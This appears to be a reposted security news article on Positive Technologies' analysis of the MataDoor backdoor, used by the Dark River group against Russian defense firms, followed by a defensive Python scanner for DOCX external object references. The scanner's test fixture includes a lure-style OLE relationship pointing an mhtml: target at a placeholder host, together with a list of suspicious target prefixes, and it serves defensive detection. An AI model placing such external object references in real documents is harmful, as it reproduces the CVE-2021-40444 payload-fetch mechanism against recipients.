Backdoor intelligence: Dark River group storms Russian defense complex

CarderPlanet

Research by Positive Technologies reveals a new threat to the Russian defense complex.

A new group, the operator of a dangerous piece of malware, which researchers have named Dark River, is deliberately attacking enterprises of the Russian defense complex and investing serious financial and intellectual resources in the development of its tools. The backdoor's highly developed architecture and transport layer allow it to operate unnoticed inside a compromised infrastructure for a long time in order to spy and steal confidential information.

For the first time, PT Expert Security Center (PT ESC) specialists have thoroughly investigated the internal structure and operating mechanisms of the complex modular MataDoor backdoor, discovered during an incident investigation last year. Dark River chooses its victims carefully and acts precisely. Several cases of MataDoor being used in cyber attacks are currently known, all of them aimed at large organizations associated with the military-industrial complex. The backdoor is well disguised: the names of its executable files resemble the names of legitimate software installed on the infected devices, and a number of samples carry a valid digital signature. To make detection as difficult as possible, its developers used various kinds of wrapper utilities that hide the malicious code.

"The main feature of the MataDoor backdoor is its complex architecture," said Maxim Andreev, Senior Specialist in the Information Security Threat Research Department at Positive Technologies. "Code analysis shows that serious resources were invested in the development of this tool. This is a well-designed malware with deep custom development in terms of transport, stealth and architecture. The group did not use off-the-shelf solutions. Many protocols were intentionally implemented by the developer from scratch. A large and complex transport system allows communication with the operator's command server to be configured flexibly, in order to remain hidden and unnoticed. This malware can operate even in logically isolated networks, pulling and transmitting data from anywhere."

Researchers believe that deployment of the backdoor begins with a phishing email to which the attackers attach a DOCX document related to the field of activity of the targeted enterprise. A distinctive feature of the lure is that it prompts the recipient to enable document editing mode; merely opening the attachment is not enough, and enabling editing is a prerequisite for the exploit to fire. Similar emails containing documents with exploits for the CVE-2021-40444 vulnerability were sent to Russian defense industry enterprises in August-September 2022. For instance, the attackers deliberately used a low-contrast font in the document text; to read it, the user changed the font color, which required switching to edit mode. At that point, malicious payloads were downloaded and executed from a resource controlled by the cybercriminals.

To protect corporate systems from the MataDoor backdoor, Positive Technologies experts recommend proactive measures: use sandboxes that can detect even such complex malware by analyzing file behavior in a virtual environment, as well as traffic analyzers. Dark River relies on email phishing, so experts advise following the standard rules of cyber hygiene: treat incoming emails and messages in messengers and social networks with caution, do not click on dubious links and do not open suspicious attachments. Since the cybercriminals used compromised mailboxes in some attacks, bear in mind that they may resort to social engineering. Accordingly, also evaluate the following carefully: whether the email contains attachments that are not typical for correspondence in your company, whether the signature is correct, whether the sender plausibly would have written to you, and whether the request falls within your area of responsibility.
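The delivery vector described above (a DOCX lure that fetches its payload from an attacker-controlled resource once editing is enabled) and the attachment-screening advice can be turned into a cheap mail-gateway triage check. The script below is an added example written for this page, not Positive Technologies' tooling or a MataDoor artifact: it unpacks a DOCX (an OOXML zip), walks every `.rels` part, and flags relationships with `TargetMode="External"` that point at an OLE object or use an `mhtml:`/`file:`/UNC target, which is the shape of the CVE-2021-40444 document pattern. The relationship-type URIs are the real OOXML constants; the two sample packages and the `c2.invalid` host are constructed fixtures built in memory so the check runs offline. Ordinary hyperlinks are deliberately skipped because they are external by design and would drown the signal in noise.

```python
"""Screen DOCX attachments for external object references (defensive triage example)."""
import io
import zipfile
import xml.etree.ElementTree as ET

# Real OOXML namespace / relationship-type URIs.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
# Target prefixes that have no business in an embedded-object reference.
FLAGGED_PREFIXES = ("mhtml:", "file:", "\\\\")


def scan_docx(data: bytes) -> list:
    """Return a list of findings for relationships that pull content from outside the package.

    Each finding is a dict with the .rels part name, a reason, and (where present)
    the relationship type and target. An empty list means nothing was flagged.
    """
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        # Not an OOXML package at all: worth a look on its own, but not a DOCX finding.
        return [{"part": None, "reason": "not a valid OOXML (zip) package"}]
    with zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                findings.append({"part": name, "reason": "unparseable relationships part"})
                continue
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue  # internal parts are resolved inside the zip
                rtype = rel.get("Type", "")
                target = rel.get("Target", "")
                if rtype == HYPERLINK_REL_TYPE:
                    continue  # plain hyperlinks are external by design; skip to limit noise
                if rtype == OLE_REL_TYPE or target.lower().startswith(FLAGGED_PREFIXES):
                    findings.append({
                        "part": name,
                        "reason": "external object reference",
                        "type": rtype.rsplit("/", 1)[-1],
                        "target": target,
                    })
    return findings


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal DOCX-like package in memory (constructed fixture, not a real lure)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed fixture: a document with one ordinary hyperlink.
BENIGN_RELS = f"""<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{HYPERLINK_REL_TYPE}" Target="https://example.com/" TargetMode="External"/>
</Relationships>"""

# Constructed fixture: an external OLE object with an mhtml: target (c2.invalid is a placeholder host).
SUSPICIOUS_RELS = f"""<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="mhtml:http://c2.invalid/lure.html" TargetMode="External"/>
</Relationships>"""

BENIGN_DOCX = build_docx(BENIGN_RELS)
SUSPICIOUS_DOCX = build_docx(SUSPICIOUS_RELS)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_DOCX), ("suspicious", SUSPICIOUS_DOCX), ("not-a-zip", b"MZ...")):
        print(label, scan_docx(blob))
```

A hit from this check is a reason to route the attachment to a sandbox for behavioral analysis, as the recommendations above suggest, rather than a verdict on its own; the inverse also holds, since a clean relationship scan says nothing about macros or other lure mechanics.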